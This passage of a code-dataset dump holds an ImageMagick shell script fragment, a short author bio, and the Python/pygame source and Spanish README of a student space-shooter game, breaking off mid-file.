$TMPDIR$uuid/infocard.png\necho \"if error issued here see comments in includes/1000x3000skyscraper.sh for comments\"\n# if imagemagick is installed from source, previous line may issue warning\n# that configuration file for delegates is missing. if the command is\n# working correctly to produce trimmed infocard you can ignore\n# the warning--this means that the correct delegate program is already\n# on the system. if the command is not producing the trimmed infocard\n# you need to fix the problem with ImageMagick. There are a number o\n# ways you can do this -- Google is your friend -- change convert to hard\n# code to a version of IM that works (which is done here) -- fix the IM configuration -- or\n# specify the delegate in the IM command line.\n\nif [ -z \"$add_this_image\" ]; then\n echo \"using wordcloud image\"\n cp $TMPDIR$uuid\"/cover/wordcloudcover.png\" $TMPDIR$uuid/skyscraperimage.png\n convert $TMPDIR$uuid/skyscraperimage.png $TMPDIR$uuid/skyscraperimage.jpg\nelse\n echo \"using user provided image\"\n convert \"$add_this_image\" $TMPDIR$uuid/skyscraperimage.jpg\nfi\n\nconvert $TMPDIR$uuid/infocard.png -border 5 $TMPDIR$uuid/infocard.png\n# put logo on 1000 px wide & trim\nconvert $scriptpath\"assets/pk35pc.jpg\" -resize 50% $TMPDIR$uuid/pksmall.jpg\nconvert $TMPDIR$uuid\"/pksmall.jpg\" -gravity center -background white -extent 1000x108 $TMPDIR$uuid/skyscraperlogo.png\n# make skyscraper\nmontage $TMPDIR$uuid/toplabel1.png \\\n$TMPDIR$uuid/skyscraperimage.jpg \\\n$TMPDIR$uuid\"/infocard.png\" \\\n$TMPDIR$uuid/skyscraperlogo.png \\\n-geometry 1000x5000 -border 10 -tile 1x10 -mode concatenate \\\n$TMPDIR$uuid/skyscraper.jpg\n\nconvert $TMPDIR$uuid\"/skyscraper.jpg\" -trim -border 30 $TMPDIR$uuid/\"$safe_product_name\".skyscraper.jpg\n" }, { "alpha_fraction": 0.7887930870056152, "alphanum_fraction": 0.7887930870056152, "avg_line_length": 153.6666717529297, "blob_id": "c5a56639214586fb211cb954f61ff1564af279cf", "content_id": "46ab88cc1cf32cd4b1a2c4d17eff1c1d4d7b3579", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 282, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Randolph_4.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Randy comes from a long family tradition of men's clubs. His great grandfather was a billing program at the Union League. As someone that has grown up in the tradition of joining a \"club\" he is well positioned to be the editor of the PageKicker series on \"Private Clubs in America\".\n\nWhen he is not researching for PageKicker, Randy loves to eat out. his mission is to taste every snapper soup recipe in every Club. Randy still swears he like black bean better...\n" } ]
253
jgamer42/proyecto_compugrafica
https://github.com/jgamer42/proyecto_compugrafica
532176b31df4642dc950724297578d9761a8793f
fdd23a97b08c8712cd80b953bf0d1ae785fda1a4
4610d07419e4bd2bba6252faa497ff03c480a3d9
refs/heads/master
2022-09-01T04:49:20.588967
2020-05-30T06:54:10
2020-05-30T06:54:10
262,649,781
5
0
null
2020-05-09T20:06:05
2020-05-28T16:09:50
2020-05-30T06:54:11
Python
[ { "alpha_fraction": 0.6089239120483398, "alphanum_fraction": 0.6233595609664917, "avg_line_length": 33.6363639831543, "blob_id": "0b6f40834af8f548d27f3d3e61f207ea3d057d4d", "content_id": "e637aa3f4d05c78a77cebbd2d5c67e33fd985054", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/models/misil_enemigo.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n#cambios\n#1. se encapsulo el metodo animar en el paquete de utilidades\n# ver nueva logica de animacion en el update\nclass Misil_enemigo(Bala_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.posActual = pos\n pos_x = self.rect.x\n pos_y = self.rect.y\n sabana = pygame.image.load(\"./Sprites/balas/SpriteEnemyMisil_I.png\")\n self.animacion = utilidades.recorte_imagen(sabana,[19,88],3)\n self.frame = 0\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n self.type = \"misil_enemigo\"\n self.daño = 130\n self.puntos = 6\n" }, { "alpha_fraction": 0.6834116578102112, "alphanum_fraction": 0.6971449255943298, "avg_line_length": 18.742856979370117, "blob_id": "c1b270130966d79d11380ab128826682869814dd", "content_id": "92138764aa4011d12639d7ec7cc100f1c41524bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2776, "license_type": "no_license", "max_line_length": 129, "num_lines": 140, "path": "/readme.md", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "# Galaxy War survival\n\n![logo del juego](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/fondos/LogoPantInit.png)\n\n## REQUERIMIENTOS\n\n* [x] intro :sunglasses:\n\n* [x] final :sunglasses:\n\n* [x] imagenes de fondo y musica :headphones:\n\n* [x] barra de información (gui) :eye:\n\n* [x] implementar 2 enemigos diferentes :space_invader: \n\n* [x] implementar 2 elementos ambientales :seedling:\n\n* [ ] implementar generadores de enemigos :anger:\n\n* [ ] implementar modificadores :dizzy:\n\n* [x] implementar como minimo 3 niveles (nota cada nivel con el triple de tamaño de la pantalla)\n\n## ELEMENTOS DE JUEGO\n\n### Jugador\n![imagen jugador](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/jugador/PlayerShipSprite_I.png)\n#### atributos\n\n* vidas = 3\n* salud = 1000\n* daño = Varia segund el bala (ver tipos de balas)\n* velocidad = 5 px\n#### comportamiento\n\n* colisiona con los bordes\n* no puede pasar de cierto punto de la pantalla\n* dispara proyectiles\n* posee diferentes estados\n\n#### detalles tecnicos\n * frames de animacion = 3\n * estados posibles = 3\n\n---\n\n### Enemigos\n\n#### tipo 1 (nombre)\n\n![enemigo basico](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/enemigos/SpriteEnemyShip_I.png)\n\n* ##### Atributos\n\n * vida = ??\n * daño = misil 1\n * velocidad = 5 px\n\n* ##### comportamiento\n\n * rebotan contra los limites laterales\n * no tienen movimiento vertical\n\n#### tipo 2 (nombre)\n\n* ##### Atributos\n\n * vida = cuanta vida tienen\n * daño = 700\n * velocidad = 5 px\n\n* ##### comportamiento\n \n * no dispara\n * rebota contra los limites de la pantalla\n * de manera aleatoria embiste al jugador para hacerle daño\n * la embestida solo permite movimiento vertical\n\n---\n\n### Balas\n\n#### Misil\n \n ![balas tipo1](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/balas/SpritePlayerMisil_I.png)\n\n* ##### Atributos\n\n * daño = 130\n * velocidad = 50 px\n\n* ##### comportamiento\n\n * se mueve de manera vertical hasta salir de la pantalla\n\n#### tipo 2 (nombre)\n\n* ##### Atributos\n* ##### comportamiento\n\n\n-----\n\n### spawner\n\n----\n\n### bloques\n\n#### asteroide\n \n![asteoride](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/bloques/Asteroid.png)\n\n * caracteristicas\n * genera daño con la colision\n * aparece por fuera de la pantalla y de desplaza acorde a la velocidad del entorno\n----\n\n### modificadores\n\n## MECANICAS\n\n* ### escenario\n\n * El escenario posee varios elementos ambientales\n * se desplaza a una velocidad de 20 px\n\n* ### condicion victoria\n\n * superar el ultimo nivel\n\n* ### condicion fin de juego\n * que el jugadro se quede sin vidas\n\n* ### condicion cambio de nivel\n\n## DISEÑOS\n\n* ### gui\n\n\n\n" }, { "alpha_fraction": 0.5712401270866394, "alphanum_fraction": 0.5910290479660034, "avg_line_length": 29.31999969482422, "blob_id": "0e964e8639a2e977a2a977c94c4287699e2cbcf5", "content_id": "4a20fedb4de515c6c55c3c1d1cdb5fb3a6c38ecc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 759, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/models/misil2.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n\nclass Misil2(Bala_base):\n\n def __init__(self,pos):\n super().__init__(pos)\n pos_x = self.rect.x\n pos_y = self.rect.y\n sabana = pygame.image.load(\"./Sprites/balas/SpritePlayerMisil_II.png\")\n self.animacion = utilidades.recorte_imagen(sabana,[15.3,88],3)\n self.frame = 0\n self.vely = -70\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n self.type = \"misil2\"\n self.daño = 253\n\n def update(self):\n super().update()\n self.frame = utilidades.animar(self.frame,3)\n self.image = self.animacion[self.frame]\n" }, { "alpha_fraction": 0.5653923749923706, "alphanum_fraction": 0.5835009813308716, "avg_line_length": 28.235294342041016, "blob_id": "3527b6bb0858f7059ba672908bf1815386435e44", "content_id": "85aec91ad4a4002f83fe94baa65186a901c59b42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 45, "num_lines": 17, "path": "/models/bala_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import constantes\n\nclass Bala_base(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.velx = 0\n self.vely = 50\n self.image = pygame.Surface([10,50])\n self.image.fill(constantes.AZUL)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.6097902059555054, "alphanum_fraction": 0.6265734434127808, "avg_line_length": 30.086956024169922, "blob_id": "0afc49bab0330a4c532d87e4f8acd38672039e2d", "content_id": "8ebf84f7a152dbf5ad0a84e8a187bd4b2687983c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/models/planeta.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom . import constantes\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import utilidades as util\n\nclass Planeta(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.frame = 0\n self.type = \"planeta\"\n sabana = pygame.image.load(\"./Sprites/bloques/Planeta1.png\")\n self.animacion = util.recorte_explosion(sabana,[72,72],5,4)\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n self.frame = util.animar(self.frame,19)\n self.image = self.animacion[self.frame]\n super().update()\n" }, { "alpha_fraction": 0.5984929800033569, "alphanum_fraction": 0.614639401435852, "avg_line_length": 34.730770111083984, "blob_id": "3d7c6372b9d3581a2ddb8e8786aa7b2fa29b9c88", "content_id": "894fcd8d58152313dfde9e7f79bb771a69a1e4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 929, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/models/enemigo_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import constantes\nclass Enemigo_base(pygame.sprite.Sprite):\n def __init__(self,pos,direccion,agresividad):\n pygame.sprite.Sprite.__init__(self)\n self.posActual = pos\n self.velx = 8*direccion\n self.vely = 0\n self.image=pygame.Surface([50,50])\n self.image.fill(constantes.AZUL)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.direccion = 1\n self.agresividad = agresividad\n\n def update(self):\n self.comportamiento_limites()\n self.posActual[0] = self.rect.x + self.velx*self.direccion\n self.rect.x = self.posActual[0]\n self.posActual[1] = self.rect.y + self.vely\n self.rect.y = self.posActual[1]\n\n def comportamiento_limites(self):\n if(self.rect.left <= 0) or (self.rect.right >= constantes.ANCHO):\n self.direccion = self.direccion*-1\n" }, { "alpha_fraction": 0.5927174687385559, "alphanum_fraction": 0.6109238266944885, "avg_line_length": 32.70454406738281, "blob_id": "6c0ad2d5037de10e6983bb21da62eb491c61732c", "content_id": "6142f7763a21e5a1c774daa8b14bb508e36beb66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1483, "license_type": "no_license", "max_line_length": 78, "num_lines": 44, "path": "/models/enemigo1.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .enemigo_base import Enemigo_base\nfrom . import utilidades as util\nfrom . import ambiente\n\nclass Enemigo1(Enemigo_base):\n def __init__(self,pos,direccion,agresividad):\n super().__init__(pos,direccion,agresividad)\n self.frame = 0\n sabana = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyShip_I.png\")\n self.animacion = util.recorte_imagen(sabana,[87,75],3,2)\n self.fila_animacion = 0\n self.image = self.animacion[self.fila_animacion][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.atacando = False\n self.type = \"enemigo1\"\n self.salud = 500\n self.puntos_impacto = 11\n self.puntos_destruir = 18\n\n def atacar(self):\n ataque = None\n if not(self.atacando):\n ataque = random.randint(0,self.agresividad)\n if(ataque == 0):\n ambiente.alarma_disparo_enemigo = True\n ambiente.origen_disparo_enemigo = self.rect.center\n\n def update(self):\n self.atacar()\n super().update()\n self.frame = util.animar(self.frame,3)\n self.cambio_animacion()\n self.image = self.animacion[self.fila_animacion][self.frame]\n\n def cambio_animacion(self):\n self.frame = util.animar(self.frame,3)\n if self.direccion > 0:\n self.fila_animacion = 0\n elif self.direccion < 0:\n self.fila_animacion = 1\n" }, { "alpha_fraction": 0.5826893448829651, "alphanum_fraction": 0.6012364625930786, "avg_line_length": 29.809524536132812, "blob_id": "520fc8fd534d813b3047944c18bbd0826dbb78a2", "content_id": "e4aa28219913d7ed246c71f6dfe107a668f85396", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/models/bloque_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom. import constantes\n\n\nclass Bloque_base(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.posActual = pos\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO\n self.image = pygame.Surface([50,100])\n self.image.fill(constantes.ROJO)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n self.posActual[0] = self.rect.x + self.velx\n self.rect.x = self.posActual[0]\n self.posActual[1] = self.rect.y + self.vely\n self.rect.y = self.posActual[1]\n" }, { "alpha_fraction": 0.558167576789856, "alphanum_fraction": 0.5798673629760742, "avg_line_length": 32.85714340209961, "blob_id": "66d6700e962e700d329bc3a844b4edcbadf1803d", "content_id": "f9c8deaadd5d92be423ca36a266dc9cdd761c3fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1660, "license_type": "no_license", "max_line_length": 80, "num_lines": 49, "path": "/models/enemigo2.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import utilidades as util\nfrom .enemigo_base import Enemigo_base\nfrom . import constantes\nimport random\nclass Enemigo2(Enemigo_base):\n def __init__(self,pos,direccion,agresividad):\n super().__init__(pos,direccion,agresividad)\n self.frame = 0\n self.animaciones = []\n self.fila_animacion = 0\n sabana = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyBoomShip.png\")\n self.animaciones.append(util.recorte_imagen(sabana,[73,121],3))\n self.image = self.animaciones[self.fila_animacion][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.atacando = False\n self.posy_inicial = pos[1]\n self.agresividad = agresividad\n self.type = \"enemigo2\"\n self.daño = 1500\n self.salud = 100\n self.puntos_impacto = 25\n self.puntos_destruir = 32\n\n def atacar(self):\n ataque=None\n if not(self.atacando):\n ataque = random.randint(0,self.agresividad)\n if(ataque == 0):\n self.velx = 0\n self.vely = 60\n self.atacando = True\n\n def comportamiento_limites(self):\n if(self.atacando):\n if(self.rect.y > constantes.ALTO) and(self.vely >0):\n self.vely = -1*self.vely\n if(self.rect.y == self.posy_inicial) and (self.vely < 0):\n self.vely = 0\n self.velx = 20\n self.atacando = False\n super().comportamiento_limites()\n\n def update(self):\n self.frame = util.animar(self.frame,3)\n self.atacar()\n super().update()\n" }, { "alpha_fraction": 0.6122961044311523, "alphanum_fraction": 0.6449184417724609, "avg_line_length": 31.310810089111328, "blob_id": "b76772226fd3c3bb1de1e37d57ebcd47edfb6189", "content_id": "ac16dbcf73b6a2523d86837a840af9aeca5c44c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2391, "license_type": "no_license", "max_line_length": 89, "num_lines": 74, "path": "/models/utilidades.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .enemigo2 import Enemigo2\nfrom .enemigo1 import Enemigo1\nfrom .asteroide1 import Asteroide1\nfrom . import constantes as con\n\ndef recorte_explosion(sabana,size,frames,filas):\n animacion = []\n for f in range(filas):\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,size[1]*f,size[0],size[1])\n animacion.append(cuadro)\n return animacion\n\ndef recorte_imagen(sabana,size,frames,filas=1):\n animacion = []\n if filas == 1:\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,0,size[0],size[1])\n animacion.append(cuadro)\n elif filas > 1:\n for f in range(filas):\n fila=[]\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,size[1]*f,size[0],size[1])\n fila.append(cuadro)\n animacion.append(fila)\n return animacion\n\ndef animar(frame_actual,numero_frames):\n if frame_actual < (numero_frames - 1):\n frame_actual = frame_actual + 1\n else:\n frame_actual = 0\n return(frame_actual)\n\ndef generar_enemigos(enemigos):\n for i in range(10):\n posx = random.randint(10,200)\n posy = random.randint(0,200)\n direccion = random.choice([-1,1])\n enemigo = Enemigo2([posx,posy],direccion,posy)\n enemigos.add(enemigo)\n for i in range(5):\n posx = random.randint(10,200)\n posy = random.randint(0,200)\n direccion = random.choice([-1,1])\n enemigo = Enemigo1([posx,posy],direccion,50)\n enemigos.add(enemigo)\n\ndef generar_asteroides(asteroides):\n asteroide = Asteroide1([50,-100])\n asteroides.add(asteroide)\n\ndef generar_modificador_balas(modif):\n modificadores = Modificador_b([50,-100])\n modificadores.add(modificadores)\n\ndef generar_modificador_naves(modif):\n modificadores = Modificador_n([50,-100])\n modificadores.add(modificadores)\n\ndef explosion_enemigos(ventana,pos):\n global animacion_muerte_enemigos\n frame = 0\n for repeticion in range(10):\n frame = animar(frame,6)\n ventana.blit(animacion_muerte_enemigos[frame],pos)\n pygame.display.flip()\n\n# sabana muerte enemigos\nsabana_muerte_enemigos = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyExplosion.png\")\nanimacion_muerte_enemigos = recorte_imagen(sabana_muerte_enemigos,[90,80],6)\n" }, { "alpha_fraction": 0.4554140269756317, "alphanum_fraction": 0.6464968323707581, "avg_line_length": 15.526315689086914, "blob_id": "7c398f3cc3aac656e9815f41d13413ee059fb62e", "content_id": "0611282a2c83f1f8608c4a6ece93533c65448cf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 24, "num_lines": 19, "path": "/models/constantes.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "#Entorno del juego\nANCHO = 768\nALTO = 690\nZONA_JUEGO = 300\nVELOCIDAD_ENTORNO = 5\nNUMERO_FPS = 17\n#elementos de las clases\nVIDAS = 3\nDERECHA = -1\nIZQUIERDA = 1\n\n#Colores\nAZUL = [5,100,252]\nMORADO = [169,40,201]\nNEGRO = [0,0,0]\nBLANCO = [255,255,255]\nNARANJA = [235, 165, 14]\nROJO = [235, 14, 14]\nNEGRO = [0, 0 , 0]\n" }, { "alpha_fraction": 0.6120689511299133, "alphanum_fraction": 0.617241382598877, "avg_line_length": 31.22222137451172, "blob_id": "891dc4e409a49b024107a026f6e5b7ba6dcdcd95", "content_id": "8a27769eb6c75afbc041d1b0264af37e709e26c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 85, "num_lines": 18, "path": "/models/modificador_nave.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom .bloque_base import Bloque_base\nfrom . import constantes\n\nclass Modificador_n(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/modificadores/ModificadorNave.png\")\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"modificador_nave\"\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.5737051963806152, "alphanum_fraction": 0.5896414518356323, "avg_line_length": 29.1200008392334, "blob_id": "d3263999e793d7c63c413cd901058a70f5cc65e4", "content_id": "badf7fff89259e9b6bbc50c3e16fca81ba570d85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 754, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/models/misil.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n\nclass Misil(Bala_base):\n\n def __init__(self,pos):\n super().__init__(pos)\n pos_x = self.rect.x\n pos_y = self.rect.y\n sabana = pygame.image.load(\"./Sprites/balas/SpritePlayerMisil_I.png\")\n self.animacion = utilidades.recorte_imagen(sabana,[19,88],3)\n self.frame = 0\n self.vely = -50\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n self.type = \"misil\"\n self.daño = 130\n\n def update(self):\n super().update()\n self.frame = utilidades.animar(self.frame,3)\n self.image = self.animacion[self.frame]\n" }, { "alpha_fraction": 0.6157965064048767, "alphanum_fraction": 0.6305220723152161, "avg_line_length": 31.478260040283203, "blob_id": "50a004803ad6ccd1854587e770de74795f87cc42", "content_id": "b19064d54678432de7d5cb9f0ec13615c3e753af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 78, "num_lines": 23, "path": "/models/agujero_negro.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import utilidades as util\n\nclass Agujero_negro(Bloque_base):\n def __init__(self,pos,direccion):\n super().__init__(pos)\n self.frame = 0\n sabana = pygame.image.load(\"./Sprites/bloques/SpriteAgujeroNegro.png\")\n self.animacion = util.recorte_imagen(sabana,[153,153],8)\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"agujero\"\n self.direccion = direccion\n\n def update(self):\n self.frame = util.animar(self.frame,8)\n self.image = self.animacion[self.frame]\n super().update()\n" }, { "alpha_fraction": 0.605831503868103, "alphanum_fraction": 0.6177105903625488, "avg_line_length": 30.931034088134766, "blob_id": "c0a0faadeb2db38715d532b5aea2bb0bc29fbe8b", "content_id": "ccb7689d8475f722df6fad0fe9187d858060e3ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 87, "num_lines": 29, "path": "/models/generador_asteroides.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import constantes\n\nclass Generador_asteroides(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/generadores/generador_asteroide.png\")\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.vely = 0\n self.generando = False\n self.type = \"generado_asteroide\"\n\n def generar(self):\n generador = None\n if not(self.generando):\n generador = random.randint(0,50)\n if(generador == 0):\n ambiente.alarma_generar_asteroide = True\n pos_asteroide_generado = random.randint(20,constantes.ANCHO-20)\n ambiente.origen_asteroide = [pos_asteroide_generado,self.rect.y]\n\n def update(self):\n self.generar()\n super().update()\n" }, { "alpha_fraction": 0.5653451085090637, "alphanum_fraction": 0.5932452082633972, "avg_line_length": 29.954545974731445, "blob_id": "6ec0f765ea260ca2359e2d9ffef0adba1af5d4e6", "content_id": "14f21c7b33c56a50f978d5ffd63193db0e4b5aef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 72, "num_lines": 22, "path": "/models/asteroide1.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom .bloque_base import Bloque_base\nfrom . import constantes\n\nclass Asteroide1(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/bloques/Asteroid.png\")\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO + 20\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"asteroide\"\n self.daño = 2500\n self.salud = 1500\n self.puntos_impacto = 50\n self.puntos_destruir = 300\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.7407602667808533, "alphanum_fraction": 0.7624076008796692, "avg_line_length": 37.65306091308594, "blob_id": "15399415e4ccbadf9d50fdf5d4c33a57c6a83b63", "content_id": "877dbf1795b4930607997e110cd90a790974b4e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1894, "license_type": "no_license", "max_line_length": 89, "num_lines": 49, "path": "/models/variables.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import utilidades\n#sprites groups\njugadores = pygame.sprite.Group()\nenemigos = pygame.sprite.Group()\nelementos_ambientales = pygame.sprite.Group()\nbalas_enemigos = pygame.sprite.Group()\nbalas_jugador = pygame.sprite.Group()\nsatelites = pygame.sprite.Group()\nmodificadores = pygame.sprite.Group()\nasteroides = pygame.sprite.Group()\ntipo_misil = \"misil\"\nestado_nave = 0\n\n#sonido\npygame.mixer.init()\nmusic_intro = pygame.mixer.Sound('./Sounds/Brave Pilots (Menu Screen).ogg')\nmusic_juego = pygame.mixer.Sound('./Sounds/Juego.ogg')\nmusic_out = pygame.mixer.Sound(\"./Sounds/Game Over.ogg\")\n\ndisparo = pygame.mixer.Sound('./Sounds/shoot.wav')\nexplosion_jugador = pygame.mixer.Sound('./Sounds/boom.wav')\n\nsound_Fireworks1 = pygame.mixer.Sound(\"./Sounds/Fireworks1.wav\")\nsound_Fireworks2 = pygame.mixer.Sound(\"./Sounds/Fireworks2.ogg\")\n\n#imagenes\nPantInit = pygame.image.load(\"./Sprites/fondos/Universe2PantInit.png\")\nLogoPantInit = pygame.image.load(\"./Sprites/fondos/Logo2PantInit.png\")\n\nsabana_game_over = pygame.image.load(\"./Sprites/fondos/SpriteGameOver.png\")\nGameOver = utilidades.recorte_imagen(sabana_game_over,[768,690],2)\n\nsabana_victoria = pygame.image.load(\"./Sprites/SpriteVictoria.png\")\nVictoria = utilidades.recorte_imagen(sabana_victoria,[768,690],2)\n\nfondo = pygame.image.load(\"./Sprites/Background.png\")\nsaba_puntos = pygame.image.load(\"./Sprites/Gui/Ambiente.png\")\nsabana_vidas = pygame.image.load(\"./Sprites/Gui/SpriteVidas.png\")\nsabana_salud = pygame.image.load(\"./Sprites/Gui/SpriteSalud.png\")\nsprite_salud = utilidades.recorte_imagen(sabana_salud,[80,30],6)\nsprite_vidas = utilidades.recorte_imagen(sabana_vidas,[116,30],3)\n\nsabana_muerte_enemigos = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyExplosion.png\")\nanimacion_muerte_enemigos = utilidades.recorte_imagen(sabana_muerte_enemigos,[90,80],6)\n\n#otros\nreloj = pygame.time.Clock()\npos_fondo = -3450\n" }, { "alpha_fraction": 0.5717801451683044, "alphanum_fraction": 0.5898277163505554, "avg_line_length": 31.078947067260742, "blob_id": "4981cc3c03cdb5d2f8e0d922228f76a80ae02f66", "content_id": "a344fa274ffb0e667660c721849bccbafefa64e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "no_license", "max_line_length": 76, "num_lines": 38, "path": "/models/satelite.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import constantes\n\nclass Satelite(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/generadores/Satelite.png\")\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.generando = 0\n self.type = \"satelite\"\n\n def cant_mod(self):\n cantidad = [30,90,120]\n if self.generando in cantidad:\n self.generando += 1\n return 